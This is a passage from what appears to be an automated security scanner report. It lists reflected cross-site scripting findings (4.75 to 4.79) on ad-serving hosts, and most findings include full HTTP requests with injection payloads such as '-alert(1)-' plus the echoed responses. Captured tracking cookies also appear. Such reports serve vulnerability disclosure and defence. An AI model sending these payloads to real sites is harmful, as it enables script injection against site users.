The value of the sz request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c3db8"-alert(1)-"90fc3118986 was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adj/N5364.nytimes/B5378238.14;sz=728x90;pc=nyt160964A265019;ord=2011.05.12.11.15.46;click=http://www.nytimes.com/adx/bin/adx_click.html?type=gotoc3db8"-alert(1)-"90fc3118986&opzn&page=blog.nytimes.com/dealbook&pos=TopAd&camp=Intel_US11q2CORMGCorp-1691749-nyt2&ad=US11q2CORMGCorp.Dealbook.dart728x90&sn2=6173115d/a6371399&snr=doubleclick&snx=1305198667&sn1=63ea7fe9/b57741b4&goto= HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://dealbook.nytimes.com/category/main-topics/mergers-acquisitions/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|844392/262198/15106,2333498/779460/15106,2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Thu, 12 May 2011 11:16:28 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6729

document.write('\n\n<script src=\"http://s0.2mdn.net/8793
...[SNIP]...
v8/3b05/7/121/%2a/g%3B240678286%3B0-0%3B0%3B63131104%3B3454-728/90%3B41996802/42014589/1%3B%3B%7Eokv%3D%3Bpc%3Dnyt160964A265019%3B%3B%7Esscs%3D%3fhttp://www.nytimes.com/adx/bin/adx_click.html?type=gotoc3db8"-alert(1)-"90fc3118986&opzn&page=blog.nytimes.com/dealbook&pos=TopAd&camp=Intel_US11q2CORMGCorp-1691749-nyt2&ad=US11q2CORMGCorp.Dealbook.dart728x90&sn2=6173115d/a6371399&snr=doubleclick&snx=1305198667&sn1=63ea7fe9/b57741b4&
...[SNIP]...

4.75. http://ad.doubleclick.net/adj/N5364.nytimes/B5378238.14 [sz parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/N5364.nytimes/B5378238.14

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 48f94'-alert(1)-'590fb15d724 was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adj/N5364.nytimes/B5378238.14;sz=728x90;pc=nyt160964A265019;ord=2011.05.12.11.15.46;click=http://www.nytimes.com/adx/bin/adx_click.html?type=goto48f94'-alert(1)-'590fb15d724&opzn&page=blog.nytimes.com/dealbook&pos=TopAd&camp=Intel_US11q2CORMGCorp-1691749-nyt2&ad=US11q2CORMGCorp.Dealbook.dart728x90&sn2=6173115d/a6371399&snr=doubleclick&snx=1305198667&sn1=63ea7fe9/b57741b4&goto= HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://dealbook.nytimes.com/category/main-topics/mergers-acquisitions/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|844392/262198/15106,2333498/779460/15106,2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Thu, 12 May 2011 11:16:33 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6729

document.write('\n\n<script src=\"http://s0.2mdn.net/8793
...[SNIP]...
v8/3b05/7/121/%2a/g%3B240678286%3B0-0%3B0%3B63131104%3B3454-728/90%3B41996802/42014589/1%3B%3B%7Eokv%3D%3Bpc%3Dnyt160964A265019%3B%3B%7Esscs%3D%3fhttp://www.nytimes.com/adx/bin/adx_click.html?type=goto48f94'-alert(1)-'590fb15d724&opzn&page=blog.nytimes.com/dealbook&pos=TopAd&camp=Intel_US11q2CORMGCorp-1691749-nyt2&ad=US11q2CORMGCorp.Dealbook.dart728x90&sn2=6173115d/a6371399&snr=doubleclick&snx=1305198667&sn1=63ea7fe9/b57741b4&
...[SNIP]...

4.76. http://ad.doubleclick.net/adj/fbn [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/fbn

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload dbd21'-alert(1)-'2002c00180f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adj/fbn;pos=kontera;sz=1x1;ord=504013981?&dbd21'-alert(1)-'2002c00180f=1 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.foxbusiness.com/markets/2011/05/03/legendary-deal-maker-ted-forstmann-treated-brain-cancer/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|844392/262198/15106,2333498/779460/15106,2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Thu, 12 May 2011 11:39:11 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 342

document.write('<a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3b05/0/0/%2a/y;225079562;0-0;1;22018143;31-1/1;36828959/36846837/1;;~okv=;pos=kontera;sz=1x1;;dbd21'-alert(1)-'2002c00180f=1;~aopt=2/1/9e/0;~sscs=%3fhttp://www.foxnews.com">
...[SNIP]...

4.77. http://ad.yieldmanager.com/st [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.yieldmanager.com
Path:	/st

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ed949"-alert(1)-"308f54cef8d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /st?anmember=541&anprice=&ad_type=pop&ad_size=0x0&section=1748713&banned_pop_types=29&pop_times=1&pop_frequency=0&pop_nofreqcap=1&ed949"-alert(1)-"308f54cef8d=1 HTTP/1.1
Host: ad.yieldmanager.com
Proxy-Connection: keep-alive
Referer: http://pepperhamilton.com/?epl=7VC_ZCF-qAinEUr8RrN2ElD1UYCHhMIpkrv4HU2ICSZqhp18zI-zQHkE8C0nDiTMgf6MYi8CRELFJtdUQvTEgSRGY6_nrN4UxmreqxnQEBZqbC2uTdEKuiAxNRMZ27auTDPfJeH2pRYyoMlkMtKon5opgpo8kGkayibaQBF1ACAQ3Oe_AADgfwUAAECA2wgAAKo-CvBZUyZZQTE2aFpCgwAAAPA
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=uid=888a2c66-6932-11e0-8830-001b24783b20&_hmacv=1&_salt=4113190855&_keyid=k1&_hmac=2bd08a6ff17f1fdebe5379daa4d53c1f64bef7b8; ih="b!!!!Q!)H$Y!!!!#=!$ZT!)Tt+!!!!#<wYoD!)`Tm!!!!#<vmX7!)`Tq!!!!#<vmX5!)`U6!!!!#<vmX0!*loT!!!!#<vl)_!,+V>!!!!-=!$Yk!,+Z*!!!!)=!2:h!/'y^!!!!#=!2:'!/Bh/!!!!)=!$iQ!/Iw4!!!!#<wF]1!/U5t!!!!#<xu,P!/YG?!!!!#<xt+b!/_KY!!!!#<vl)T!/as*!!!!#=!$hi!/h[p!!!!#<vl)[!/iq6!!!!$<vmX=!/iq@!!!!$<vm`!!/iqB!!!!#<vmTN!/iqH!!!!#<vmTH!/o*l!!!!#=!$g0!0)='!!!!$=!$bL!024(!!!!#<ypn>!0242!!!!#<ypnV!0Q[1!!!!#=!$`1!0eUu!!!!#<y]8.!0ji6!!!!'<xqS_!0ji7!!!!%<xqRm!0w#U!!!!#=!$[A!0w#[!!!!#=!$]p!1EYJ!!!!#<wUv<!1M!9!!!!$<wF]9!1NgF!!!!#<xt,P!1Z!K!!!!#<xt]R!1`)_!!!!#<wYiT!1`XP!!!!#=!$iV!1`Xi!!!!#=!$fG!1kC+!!!!%<xqSY!1kC5!!!!$<yqWP!1kC<!!!!#<xqQb!1kDI!!!!#<xqQM!1mN8!!!!#=!$d%!2)PY!!!!#=!$c9!2/j@!!!!#=!2:6!28V/!!!!$=!2:N"; pv1="b!!!!:!#3yC!,Y+@!$Xwq!1`)_!%bq`!!!!$!?5%!$U=A2!w1K*!%4fo!$k7.!'pCX~~~~~<wYiT=#mS_~!#M*E!!!(#!$u#*!0242!%=e2!!!%%!?5%!%5F4/!wVd.!'iA7!'D#r!'AvZ~~~~~<ypnV=!oTp~!!J<[!,p['!#=4U!,+Z*!$%hK!#:m/~%5XA4!w1K*!$NK_!$OyC!$hK:~~~~~=!2:h=!K3cM.jTN!!L7_!,p['!#=4U!,+Z*!$%hK!#:m/~%5XA4!w1K*!$NK_!$OyC!$hK:~~~~~=!2:h=#0y*M.jTN!#q(2!,x.^!$Rao!0w#[!%R[j!(-EV!?5%!$q31/!wVd.!%vQM!%C9A!']NU~~~~~=!$]p=!>Uk!!!#G!#wj[!,x.^!$Rao!0w#[!%R[j!(-EV!?5%!$q31/!wVd.!%vQM!%C9A!']NU~~~~~=!$]p=!>Uk!!!#G!#wj]!,x.^!$Rao!0w#[!%R[j!(-EV!?5%!$q31/!wVd.!%vQM!%C9A!']NU~~~~~=!$]p=!JR=!!!#G!!:Om!,x.^!$Rao!0Q[1!%ICt!(Ra[!?5%!$q31/!wVd.!%vQM!#d5Z!'Q$x~~~~~=!$`1=##FK~!!:PM!,x.^!$Rao!0Q[1!%ICt!(Ra[!?5%!$q31/!wVd.!%vQM!#d5Z!'Q$x~~~~~=!$`1=##FK~!!:R7!,x.^!$Rao!0Q[1!%ICt!(Ra[!?5%!$q31/!wVd.!%vQM!#d5Z!'Q$x~~~~~=!$`1=##FK~!!:TL!,x.^!$Rao!0Q[1!%ICt!(Ra[!?5%!$q31/!wVd.!%vQM!#d5Z!'Q$x~~~~~=!$`1=##FK~!!tMh!,x.^!$Rao!0Q[1!%ICt!(Ra[!?5%!$q31/!wVd.!%vQM!#d5Z!'Q$x~~~~~=!$`1=##FK~!!tMj!,x.^!$Rao!0Q[1!%ICt!(Ra[!?5%!$q31/!wVd.!%vQM!#d5Z!'Q$x~~~~~=!$`1=##FK~!!tMm!,x.^!$Rao!0Q[1!%ICt!(Ra[!?5%!$q31/!wVd.!%vQM!#d5Z!'Q$x~~~~~=!$`1=##FK~!!tMo!,x.^!$Rao!0Q[1!%ICt!(Ra[!?5%!$q31/!wVd.!%vQM!#d5Z!'Q$x~~~~~=!$`1=##FK~!!tMq!,x.^!$Rao!0Q[1!%ICt!(Ra[!?5%!$q31/!wVd.!%vQM!#d5Z!'Q$x~~~~~=!$`1=##FK~!!LdL!,x.^!$Rao!0)='!%bu4!)F7a!!?5%$q310!wVd.!%vQM!%C9A!'pH$~~~~~=!$bL=!JVp!!!#G!$*[q!,x.^!$Rao!2)PY!%iKw!)kPg!?5%!$q31/!wVd.!%vQM!#rxb!'y>c~~~~~=!$c9='8MD~!$*[s!,x.^!$Rao!2)PY!%iKw!)kPg!?5%!$q31/!wVd.!%vQM!#rxb!'y>c~~~~~=!$c9='8MD~!$*[u!,x.^!$Rao!2)PY!%iKw!)kPg!?5%!$q31/!wVd.!%vQM!#rxb!'y>c~~~~~=!$c9='8MD~!$*[w!,x.^!$Rao!2)PY!%iKw!)kPg!?5%!$q31/!wVd.!%vQM!#rxb!'y>c~~~~~=!$c9='8MD~!#u*W!!!/p!$YQ#!1`XP!%cM5!#:m1!?5%!$q31/!wVd.!'0v@!%Mqq!'q-*~~~~~=!$iV~~!#g<5!!!/p!$YQ#!/as*!%<)(!!mT-!?5%!$q31/!wVd.!'0v@!%Mqq!'?wJ~~~~~=!$hi~~"; lifb=*Tk,Jb.[D5dVZ8Ls8s'au>5f*!LvQp_Z5lxm/ZqKvPS6f; bh="b!!!%+!!!?H!!!!%<wR0_!!*oY!!!!+<yq][!!-?2!!!!1<yq][!!-G2!!!!$<w[UB!!-O3!!!!%<yq][!!-yu!!!!.<vm`$!!.+B!!!!.<vm`%!!.tS!!!!,<yq][!!0O4!!!!,=!2<(!!0O<!!!!5=!2<(!!0P,!!!!#<x4hf!!1Mv!!!!$<y45e!!2(j!!!!/<whqI!!2a*!!!!#=!4ti!!4Qs!!!!%<wle3!!=cS!!!!'<yV[r!!?VS!!B1c<xl.o!!J<=!!!!2=!2<(!!J<E!!!!2=!2<(!!J>I!!!!#<x)TA!!L(^!!!!$<xD>X!!LHY!!!!.<whoV!!L[f!!!!#<wYl+!!ONX!!!!#<wle$!!ObA!!!!,<yq][!!PL`!!!!$<y461!!RZ(!!!!)<xt,H!!VQ(!!!!#<wYkr!!Zwb!!!!*<yq][!!`4u!!!!%<y66/!!dNP!!!!%<x+rS!!g5o!!!!'<wsq+!!iV_!!!!%<wsq-!!i[%!!!!#<x4hf!!ita!!!!3=!2<(!!q:E!!!!0=!2<(!!q<+!!!!1=!2<(!!q</!!!!1=!2<(!!q<3!!!!1=!2<(!!r^4!!!!(<x+rV!!r^5!!!!#<x*ig!!tjQ!!!!,<yq][!!ucq!!!!5=!2<(!!vRm!!!!,=!2<(!!vRq!!!!,=!2<(!!vRr!!!!,=!2<(!!vRw!!!!5=!2<(!!vRx!!!!,=!2<(!!vRy!!!!,=!2<(!!w3l!!!!,<yq][!!wQ3!!!!,<yq][!!wQ5!!!!,<yq][!!wcu!!!!#<xCAG!!wq:!!!!#<xCAF!!xX$!!!!#<x(sS!!xX+!!!!#<x(rt!!y!r!!!!,=!2<(!##^t!!!!#<wYoF!#'uj!!!!#<wsgD!#*Xa!!!!#=!=SS!#*Xb!!!!#<yMiw!#*Xc!!!!#<xE(*!#+<r!!!!#<wO:5!#+di!!!!#<xYi<!#+dj!!!!#<xYi<!#+dk!!!!#<xYi<!#-B#!!!!#<wsXA!#-H0!!!!#<wleD!#.dO!!!!+<xt,H!#1*C!!!!*<yq][!#27)!!!!+<x+rW!#2RS!!!!#<x9#3!#2XY!!!!,=!2<+!#2YX!!!!#<vl)_!#3<E!!!!$<yr$1!#3=/!!!!#=!28U!#3>J!!!!#<x(U)!#3g6!!!!#<w>/l!#3pS!!!!#<x31-!#3pv!!!!#<wsXA!#44f!!!!,=!2<(!#48w!!2s=<xrZD!#5(U!!!!#<x,:<!#5(a!!!!#<x3.t!#5[N!!!!#<vl)_!#5kt!!!!#<x)TA!#5nZ!!!!,=!2<(!#6hK!!!!#=!27c!#7.'!!!!,=!2<(!#7.:!!!!,=!2<(!#7.O!!!!,=!2<(!#8Mo!!!!#<wle%!#8tG!!!!#<wsq,!#=-g!!!!#<xi5p!#Ie+!!!!#=!27c!#KjQ!!B1c<xl.o!#Km.!!!!#=!27c!#Km/!!!!#<xl/o!#L]q!!!!#<w>/s!#MHv!!!!$<w>/n!#MTC!!!!,=!2<(!#MTF!!!!,=!2<(!#MTH!!!!,=!2<(!#MTI!!!!,=!2<(!#MTJ!!!!,=!2<(!#MTK!!!!#<w>/m!#M]c!!!!)<xt,H!#Mr7!!!!#<w>/l!#O29!!!!*<yq][!#O>d!!C`.<xrYg!#SCj!!!!+<xt,H!#SCk!!!!+<xt,H!#SEm!!!!2=!2<(!#SF3!!!!2=!2<(!#T,d!!!!#<wsXA!#T8R!!!!#<x+I0!#TnE!!!!,=!2<(!#UDP!!!!2=!2<(!#UZs!!!!#<yjEy!#U_(!!!!*<wleI!#V7#!!!!#<x,:<!#V8a!!!!#<xq_s!#VEP!!!!#<wleE!#VO3!!!!#<xq_q!#Wb^!!C`.<xrYg!#X8Y!!!!#<xr]M!#XI8!!!!#<xL%*!#Z8A!!!!*<yq][!#ZPp!!!!#<y,`,!#[L>!!!!%<w[UA!#]%`!!!!%=!$iT!#]9R!!!!#<yq[g!#]@s!!!!%<whqH!#]Z!!!!!*<yq][!#^bt!!!!%<xr]Q!#^d6!!!!%=!$iT!#`-7!!!!*<yq][!#`S2!!!!,<yq][!#`U0!!!!+<yq][!#`U9!!!!*<yq][!#a'?!!!!#<w>/m!#a4,!!!!#<y,`,!#a=6!!!!+<yq][!#a=7!!!!+<yq][!#a=9!!!!+<yq][!#a=P!!!!+<yq][!#aCq!!!!(<w[U@!#aG>!!!!+<xt,H!#ah!!!!!,=!2<(!#ai7!!!!,=!2<(!#ai?!!!!,=!2<(!#b<a!!!!#<x,:<!#b='!!!!#<x3.t!#b=*!!!!#<x,:<!#b=F!!!!#<x3.t!#b@%!!!!#<wsXA!#bGi!!!!#<xr]M!#c-u!!!!-<w*F]!#c8V!!!!*<yq][!#c8W!!!!*<yq][!#c8X!!!!*<yq][!#c8]!!!!*<yq][!#c?c!!!!,=!2<(!#ddE!!!!#<xYi>!#e(g!!!!#<xE(*!#e3[!!!!$<yq][!#e@T!!!!#<ypn:!#eLS!!!!#<yjEE!#eaO!!!!+<xt,H!#ec)!!!!%<x+rF!#fG)!!!!*<yq][!#fG+!!!!+<yq][!#ffc!!!!#=!27c!#g=!!!!!*<yq][!#g]5!!!!)<xdAS!#gig!!!!#<xt+`!#h.N!!!!#<yMiw!#j9y!!!!#<yq^W!#l)E!!!!#<y,`,!#mP5!!!!$<w[UB!#mP6!!!!$<w[UB!#n`.!!!!#=!27c!#ne_!!!!*<yq][!#ni8!!!!#<x*cS!#p6E!!!!%<wleK!#p6Z!!!!#<wle8!#p7'!!!!#<yMiw!#p]R!!!!#<wsXA!#p]T!!!!#<wsXA!#q),!!!!#<wO:5!#q2T!!!!.<whoV!#q2U!!!!.<whoV!#q9]!!!!#<waw+!#qx3!!!!#<wGkF!#qx4!!!!#<wGk*!#r:A!!!!#<waw,!#r<X!!!!#<x+I@!#rVR!!!!,=!2<(!#sAb!!!!$<y46(!#sAc!!!!$<y46(!#sC4!!!!$<y46(!#sax!!!!#<xd-C!#tLy!!!!,=!2<(!#tM)!!!!,=!2<(!#tn2!!!!,=!2<(!#uE=!!!!#<x9#K!#uJY!!!!2=!2<(!#uR3!!!!*<yq][!#ujQ!!!!*<yq][!#ust!!!!+<xt,H!#usu!!!!+<xt,H!#v,Y!!!!#<x2wq!#vyX!!!!,=!2<(!#w!v!!!!#<wsXA!#wGj!!!!#<wle$!#wGm!!!!#<wle$!#wW9!!!!+<xt,H!#wYG!!!!$=!$J$!#wnK!!!!)<xt,H!#wnM!!!!)<xt,H!#wot!!!!#<xt>i!#xI*!!!!+<xt,H!#xIF!!!!/=!2<(!#yM#!!!!+<xt,H!#yX.!!!!9<w*F[!$!>x!!!!*<wjBg!$!_`!!!!#<y,`,!$#3q!!!!(<x+Z1!$#B>!!!!)<yq][!$#R7!!!!,=!2<(!$#S3!!!!#<y,`,!$#WA!!!!+<xt,H!$$K<!!!!$<wleJ!$$L.!!!!#<w[Sh!$$L/!!!!#<w[Sh!$$L0!!!!#<w[Sh!$$LE!!!!#<w[_a!$$LL!!!!$<w[_f!$$R]!!!!#<xl/)!$$j2!!!!#<xKwk!$$p*!!!!#<wUv4!$%,!!!!!+<xt,H!$%,J!!!!#<x2wq!$%SB!!!!+<xt,H!$%Uy!!!!#<w>/l!$%gQ!!!!#<y,`,!$'/1!!!!#<wx=%!$'Z-!!!!,=!2<(!$(!P!!!!,<yq][!$(+N!!!!#<wGkB!$(Gt!!!!/=!2<(!$(S9!!!!*<yq][!$(Tb!!!!$=!2<E!$(V0!!!!'<ypo5!$)>0!!!!#<xqaf!$)DE!!!!#<xr]M!$)GB!!!!,<yq][!$*R!!!!!%<xr]Q!$*a0!!!!'<xt,H!$*bX!!!!#<xr]Q!$*hf!!!!*<yq][!$+Du!!!!#=!2<5!$+Rd!!!!#=!2<5"; BX=8khj7j56qmjsh&b=4&s=dk&t=106

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 12:02:46 GMT
Server: YTS/1.18.4
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Cache-Control: no-store
Last-Modified: Thu, 12 May 2011 12:02:46 GMT
Pragma: no-cache
Content-Length: 4432
Age: 0
Proxy-Connection: close

/* All portions of this software are copyright (c) 2003-2006 Right Media*/var rm_ban_flash=0;var rm_url="";var rm_pop_frequency=0;var rm_pop_id=0;var rm_pop_times=0;var rm_pop_nofreqcap=0;var rm_passb
...[SNIP]...
k=0;var rm_tag_type="";rm_pop_frequency = 0; rm_pop_times = 1; rm_pop_nofreqcap = 1; rm_pop_id = 1748713; rm_tag_type = "pop"; rm_url = "http://ad.yieldmanager.com/imp?Z=0x0&anmember=541&anprice=&y=29&ed949"-alert(1)-"308f54cef8d=1&s=1748713&_salt=2823841568";var RM_POP_COOKIE_NAME='ym_pop_freq';var RM_INT_COOKIE_NAME='ym_int_freq';if(!window.rm_crex_data){rm_crex_data=new Array();}if(rm_passback==0){rm_pb_data=new Array();if(
...[SNIP]...

4.78. http://admeld.adnxs.com/usersync [admeld_adprovider_id parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://admeld.adnxs.com
Path:	/usersync

Issue detail

The value of the admeld_adprovider_id request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f2784'-alert(1)-'79a228804ed was submitted in the admeld_adprovider_id parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /usersync?calltype=admeld&admeld_user_id=ac5afe89-dbe3-4a99-9c60-59f4fb495cb9&admeld_adprovider_id=193f2784'-alert(1)-'79a228804ed&admeld_call_type=js&admeld_callback=http://tag.admeld.com/match HTTP/1.1
Host: admeld.adnxs.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/3/foxbusiness/300x250/ros?t=1305200290013&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.foxbusiness.com%2Fmarkets%2F2011%2F05%2F03%2Flegendary-deal-maker-ted-forstmann-treated-brain-cancer%2F&refer=http%3A%2F%2Fwww.foxbusiness.com%2Fmarkets%2F2011%2F05%2F03%2Flegendary-deal-maker-ted-forstmann-treated-brain-cancer%2F
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sess=1; icu=ChIIn4MBEAoYAiACKAIwsMeq7gQKEgibiwEQChgDIAMoAzDcyKruBAoSCN--AhAKGAEgASgBMOHequ4EEOHequ4EGBQ.; acb757416=5_[r^XI()vsh<co>bPMvW_l44?enc=AAAAAAAA8D_NzMzMzMzsPwAAAKCZmfk_zczMzMzM7D8AAAAAAADwP0t2I4uVLkAzSsYda6b2ziVhr8pNAAAAAJdIBgA3AQAAMgMAAAIAAABXAgQAfL8AAAEAAABVU0QAVVNEAKAAWAKqAQAAPw8BAgUCAAUAAAAACyF_DAAAAAA.&tt_code=cm.pub_webmd&udj=uf%28%27a%27%2C+9940%2C+1305128822%29%3Buf%28%27c%27%2C+59839%2C+1305128822%29%3Buf%28%27r%27%2C+262743%2C+1305128822%29%3B&cnd=!mhzYQwi_0wMQ14QQGAAg_P4CMAE4qgNAAEiyBlCXkRlYAGDaAWgAcAB4AIABAIgBAJABAZgBAaABAqgBA7ABArkBAAAAAAAA8D_BAQAAAAAAAPA_yQGamZmZmZnxP9ABANAB4V0.&ccd=!TQWvKgi_0wMQ14QQGPz-AiAA; uuid2=2724386019227846218; anj=Kfw)(H.Ook)_c8%r9ff]S@h8KANc]mP0h#i:1kZfDLeOJ8#%:'=tMdp)hT=FiVaam_7'jPTW.C%.HxVrFU+@):Ol/][9rD6QF]:$2o$=2t6Ekuw9KB7t>8oBvD:k99t)AUvBQXpMrB.WZ5q$]?qZQ<Vu[#-5^T/x)S7Oq?h<uC6Z'cFlMBT^$(tZTqQER-Qb:5W?g#97-6xWK*4C*9Y>i-@J(yrw^Ur004(6av#+:`V.$%Pg]1DL-tn5$I':[WH#s(nOG69jVj#uUqQEFm_f3-WbrQnxP_drdf#rnuCaB*1I[+NvK[h(c^5Cfj.]G5(':2LiI%%e8#U`X)iJ[4k+(rXIJhdni<)gQjgMUOcN^MOw573KS9ffE$yoAk:>vBb/x@'DVx72K/G/TF_NOLJt[Iy>s!G$dq2Xo:NAZ$7JjL5hQ1Wl:w0(Oa@MM`A:J5wBQuG9jejGeOsVqM1%Tv8OvW0d`NSP4F`8%4q]@s=N3tj7_2rE.]F]824R1O]-r7%W#2%YUAe0vv=@J-XlNPR`5^cw-2hGuDpvfqe=s6vBS!qVDC)at^+-@uA6Zcf)LUf'Vu<UUwffAv@PD(x%bOXCT7ce=h0.JV^-rud6M/nMD2uDe+h%f9jmNXTMyW!I=tuJLUZJ#YJ4>1u!>#NuZ#?6t96[:wU5#1KSrBf*SZTK8<Ta<L772@gT_5e9PMtHS(PR0#:aQJ9n`5j

Response

4.79. http://admeld.adnxs.com/usersync [admeld_callback parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://admeld.adnxs.com
Path:	/usersync

Issue detail

The value of the admeld_callback request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 56dd9'-alert(1)-'f19d2452188 was submitted in the admeld_callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /usersync?calltype=admeld&admeld_user_id=ac5afe89-dbe3-4a99-9c60-59f4fb495cb9&admeld_adprovider_id=193&admeld_call_type=js&admeld_callback=http://tag.admeld.com/match56dd9'-alert(1)-'f19d2452188 HTTP/1.1
Host: admeld.adnxs.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/3/foxbusiness/300x250/ros?t=1305200290013&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.foxbusiness.com%2Fmarkets%2F2011%2F05%2F03%2Flegendary-deal-maker-ted-forstmann-treated-brain-cancer%2F&refer=http%3A%2F%2Fwww.foxbusiness.com%2Fmarkets%2F2011%2F05%2F03%2Flegendary-deal-maker-ted-forstmann-treated-brain-cancer%2F
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
